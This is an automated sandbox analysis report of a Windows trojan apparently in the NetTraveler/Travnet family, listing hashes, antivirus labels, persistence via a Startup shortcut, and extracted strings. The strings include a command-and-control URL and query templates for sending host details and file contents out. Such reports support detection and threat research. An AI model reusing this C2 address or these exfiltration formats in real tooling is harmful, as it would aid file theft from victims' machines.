Analysis Date2015-12-01 21:37:08
MD5e6a393b265caf3f6b84c1a0d2a671b9a
SHA154648d75047d2cb8b7eb6fe1a9f4eeb8399821b4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 633454e8da2cc537d4c9a5e52b963577 sha1: 5b3099cfbc0b62f9816898e2f4319e222cc95fc6 size: 233472
Section.rdata md5: a54f46f74ec7d88c1907d4f45396073e sha1: 1450416e3c33c080cd21e0a4f4de9039d02bc50e size: 12288
Section.data md5: 80aa6b709519425ce760aef9d7ed2eb6 sha1: 8300b2b574f4a2aea0197714907d29578aaa7f1d size: 20480
Section.idata md5: d5bf3d49c1531ba9e7076809483f33d8 sha1: 5668a282e056eb4809c1bdeedb684d602afc9d88 size: 8192
Section.rsrc md5: 116ad736a31188e1b3a35e452dde99e3 sha1: 95f51988099333d7ee425cb111f1bbf65040ac96 size: 160768
Timestamp2010-04-16 02:04:25
Pdb path@
PackerMicrosoft Visual C++ 5.0
PEhash17f5d2c4cebe31b3f91020aa51e03bc0ee615489
IMPhashd0706c5e131edbff1fdcd80995ce2b8e
AVCA (E-Trust Ino)Win32/FakeFLDR_i
AVMcafeeW32/Worm-FPG!E6A393B265CA
AVMalwareBytesWorm.Agent.RC
AVF-SecureGen:Variant.Strictor.54690
AVFrisk (f-prot)no_virus
AVTwisterTrojan.093EA995FCEF8BF3
AVEset (nod32)Win32/Agent.PWF
AVMicroWorld (escan)Gen:Variant.Strictor.54690
AVTrend MicroTSPY_BE.7BF2119A
AVDr. WebTrojan.PWS.Gamania.41439
AVCAT (quickheal)Trojan.Beaugrit.r5
AVEmsisoftGen:Variant.Strictor.54690
AVBitDefenderGen:Variant.Strictor.54690
AVAd-AwareGen:Variant.Strictor.54690
AVAvira (antivir)TR/Crypt.CFI.Gen
AVAlwil (avast)Dropper-gen [Drp]
AVFortinetW32/Agent.GZLE!tr
AVMicrosoft Security EssentialsTrojan:Win32/Beaugrit.gen!AAA
AVIkarusTrojan-Spy.Win32.Travnet
AVKasperskyTrojan-Downloader.Win32.Agent.gzle
AVVirusBlokAda (vba32)no_virus
AVClamAVWin.Trojan.Neshgaig
AVArcabit (arcavir)Gen:Variant.Strictor.54690
AVBullGuardGen:Variant.Strictor.54690
AVZillya!Downloader.Agent.Win32.250225
AVAuthentiumW32/Trojan.TZVE-7926
AVK7Trojan ( 000cbae21 )
AVSymantecTrojan.Travnet
AVGrisoft (avg)Downloader.Agent2.BSMJ
AVRisingWorm.Win32.VBInjectEx.a

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\cmss.exe
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Start Menu\cmss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\RECYCLER_w\AllIndex.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\RECYCLER_w\AllIndex.ini_d
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\seruvice.lnk
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\RECYCLER_w\AllIndex.ini

Network Details:

DNSsmtp.glbdns2.microsoft.com
Type: A
65.55.163.152
DNSsmtp.glbdns2.microsoft.com
Type: A
65.55.176.126
DNSsmtp.live.com
Type: A

Raw Pcap

Strings
*
0
0
_
..
00-+ 
-E-0
-0
-
-
.
] 
-e-
\
.
.
.
0
0
  
...........?-  
0
 
0
0 
0
u
!
!
.
/
/
5

Cjjj
Cjjjj
         (((((                  H
jjjj
jjjjj
jjjjjj
(null)
{{{{{{{{
{{{{{{{{{{
{{{{{{{{{{{{{
{{{{{{{{{{{{{{{{{{{
#'#'#'#'#'",
########################
									
										
													
																								
{{{{{{{{{{{{0
{{{{{{{{{{{{{0
1#QNAN
1#SNAN
''''''''''''''''@2^
\2013\Uproject(
33333333333330
3333333333333333333
%4d%2d%2d%2d%2d%2d%5s
!4JJJJ1Y^
4seCE|
$'''''''''''''''-5D
! )6PseC|(
6PY^^^^^
?}-------------+_7P^
9|$$_^]
.AAAAAAAAAAAAAAABB`:6/^^^^
{AAAAAcr7SJseC|
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/
abnormal program termination
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
a_cmp.c
ADVAPI32.dll
a_env.c
AllIndex.ini
AllIndex.ini_d
Allocation too large or negative: %u bytes.
Assertion failed: 
Assertion failed!
Assertion Failed
Assertion failed: %s, file %s, line %d
Bad memory block found at 0x%08X.
$BBBBBBBBf`:oQ8^^^
begin::
_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)
_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)
.''''''''''''''''''''''''c0^
cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0
C:\Documents and Settings\Administrator\
chsize.c
ch != _T('\0')
Client
client block at 0x%08X, subtype %x, %u bytes long.
Client hook allocation failure.
Client hook allocation failure at file %hs line %d.
Client hook free failure.
Client hook re-allocation failure.
Client hook re-allocation failure at file %hs line %d.
CloseHandle
cmss.exe
CoCreateInstance
CoInitialize
CompareStringA
CompareStringW
CopyFileA
CoUninitialize
CreateDirectoryA
CreateFileA
CreateProcessA
crt block at 0x%08X, subtype %x, %u bytes long.
_CrtCheckMemory()
_CrtDbgReport: String too long or IO Error
_CrtIsValidHeapPointer(pUserData)
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
 : 		%d
 : 			%d
: 		%d
'-----------------------d*^
D$0PQS
DAMAGE: after %hs block (#%d) at 0x%08X.
DAMAGE: before %hs block (#%d) at 0x%08X.
DAMAGED
DAMAGE: on top of Free block at 0x%08X.
 Data: <%s> %s
dbgdel.cpp
dbgheap.c
dbgrpt.c
DebugBreak
Debug %s!
DeleteFileA
Detected memory leaks!
DOMAIN error
D$(PSj
Dumping objects ->
),eCE|
Error: memory allocation: bad memory block type.
ExitProcess
Expression: 
failure, see the Visual C++ documentation on asserts
failure, see the Visual C++ documentation on asserts.
fclose.c
fffffffffv_74J^^^^
ffffv_Z43^^^^^
Fformat != NULL
fgetc.c
fgets.c
f		i^^
_filbuf.c
File: 
_file.c
#File Error#(%d) : 
filename != NULL
file != NULL
*file != _T('\0')
FileTimeToSystemTime
FindFirstFileA
FindNextFileA
flag == 0 || flag == 1
- floating point not loaded
_flsbuf.c
FlushFileBuffers
fopen.c
For information on how your program can cause an assertion
fprintf.c
fRealloc || (!fRealloc && pNewBlock == pOldBlock)
_freebuf.c
FreeEnvironmentStringsA
FreeEnvironmentStringsW
fscanf.c
fseek.c
ftell.c
GetACP
GetActiveWindow
_getbuf.c
GetCommandLineA
GetComputerNameA
GetCPInfo
GetCurrentProcess
GetCurrentThreadId
GetDiskFreeSpace
GetDiskFreeSpaceA
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileType
GetInputState
GetLastActivePopup
GetLastError
GetLocalTime
GetLogicalDriveStringsA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetTempFileNameA
GetTempPathA
GetTickCount
GetTimeZoneInformation
GetVersion
GetVersionExA
GetVolumeInformationA
%G\JJzF
__GLOBAL_HEAP_SELECTED
`h````
HeapAlloc
_heapchk fails with _HEAPBADBEGIN.
_heapchk fails with _HEAPBADEND.
_heapchk fails with _HEAPBADNODE.
_heapchk fails with _HEAPBADPTR.
_heapchk fails with unknown return value!
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HeapValidate
%hJJJJFH
%hs allocated at file %hs(%d).
%hs(%d) : 
%hs located at 0x%08X is %u bytes long.
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
http://www.viprambler.com/newsinfo/uld/nettraveler.asp
i386\chkesp.c
: 		%I64d
.idata
Ignore
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)
Index.ini
input.c
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
Invalid allocation size: %u bytes.
ioinit.c
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
?IsProcessorFeaturePresent
J<38^^^^^
J{Aff_7beC|
JalTJ3^^^^
JanFebMarAprMayJunJulAugSepOctNovDec
Ji{xxxx_Oy|
JJ(Hccccc`
JJJJJ\,hE
JJJJJJ
JJJJJJJ
JJJJJJJJ
JJJJJJJJJ
JJJJJJJJJJ^
JJseCz|(
k----------@=:64JD
kAAAAAAAAAAAActZSJ^^^^
KERNEL32
KERNEL32.dll
Largest number used: %ld bytes.
LCMapStringA
LCMapStringW
{%ld} 
%ld bytes in %ld %hs Blocks.
length<=MAX_WND_SIZE
Line: 
LoadLibraryA
localind
L=RECYCLER_w
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
MB_CUR_MAX == 1 || MB_CUR_MAX == 2
mbtowc.c
memory check error at 0x%08X = 0x%02X, should be 0x%02X.
MessageBoxA
Microsoft Visual C++ Debug Library
Microsoft Visual C++ Runtime Library
mode != NULL
*mode != _T('\0')
Module: 
MoveFileA
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
Normal
normal block at 0x%08X, %u bytes long.
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
(null)
o|}BBBBBBBBBBBBBBBBBBBBB+]7O^
Object dump complete.
offset<MAX_WND_SIZE
o/KR^^^
ole32.dll
_open.c
osfinfo.c
output.c
OutputDebugStringA
{{{{{{{{{{{{{{{{{{{p
				P^
{{{{{{{{{{{{{p0
_pFirstBlock == pHead
_pFirstBlock == pOldBlock
pHead->nBlockUse == nBlockUse
pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
_pLastBlock == pHead
_pLastBlock == pOldBlock
pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
PostThreadMessageA
ppxxxx
Pragma: no-cache
(Press Retry to debug the application)
(Press Retry to debug the application - JIT must be enabled)
printf.c
Program: 
Program Files
<program name unknown>
Program: %s%s%s%s%s%s%s%s%s%s%s
Proxy-Connection: Keep-Alive
PRSVWh
- pure virtual function call
-------+=r,
.rdata
ReadFile
RECYCLER
RECYCLER_d
RECYCLER_u
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
RtlUnwind
runtime error 
Runtime Error!
{{{{{{{{{{{{{{{{{{s
{{{{{{{{{{{{{{{{{{{s
%s?action=datasize
%s?action=getdata
%s?action=updated&hostid=%s
%s(%d) : %s
Second Chance Assertion Failed: File %s, Line %d
seruvice
\seruvice.lnk
SetConsoleCtrlHandler
SetEndOfFile
setenv.c
SetEnvironmentVariableA
SetFileAttributesA
SetFilePointer
SetHandleCount
SetStdHandle
SetUnhandledExceptionFilter
setvbuf.c
_sftbuf.c
SHELL32.dll
ShellExecuteA
%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext=
SING error
size >= 0
smtp.live.com
smtp.yahoo.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
sprintf.c
Start Menu
Startup
stdargv.c
stdenvp.c
stream.c
stream != NULL
string != NULL
str != NULL
strupr.c
Success:
%s:UNINSTALL
SunMonTueWedThuFriSat
%s:UPLOAD
SYSTEMIF
System Volume Information
szUserMessage != NULL
TerminateProcess
=tGjyh
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention. 
!This program cannot be run in DOS mode.
T$ j R
TLOSS error
Total allocations: %ld bytes.
TranIndex.ini
t.;t$$t(
;t$$wRW
t`WWWj
tzset.c
tZSJNW^^^
ulBytesCoded==ulDataLength
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
ungetc.c
UnhandledExceptionFilter
../updata.exe
\Uproject\UprojectWin32\Lz77.cpp
)\UprojectWin32\LZ7.cpp
user32.dll
USER32.dll
VC20XC00U
VirtualAlloc
VirtualFree
vsprintf.c
{{{{{{{{{{{{w
{{{{{{{{{{{{{{{{{{{w
Warning
WideCharToMultiByte
WINDOWS
WININET.dll
WriteFile
WS2_32.dll
wsprintfA
wtombenv.c
wwwwwwwwwwww
wwwwwwwwwwwwwwwwww{s
{{{{{{x
{{{{{{{{{{{{x
{{{{{{{{{{{{{{{{{{{x
xxxx@gmail.com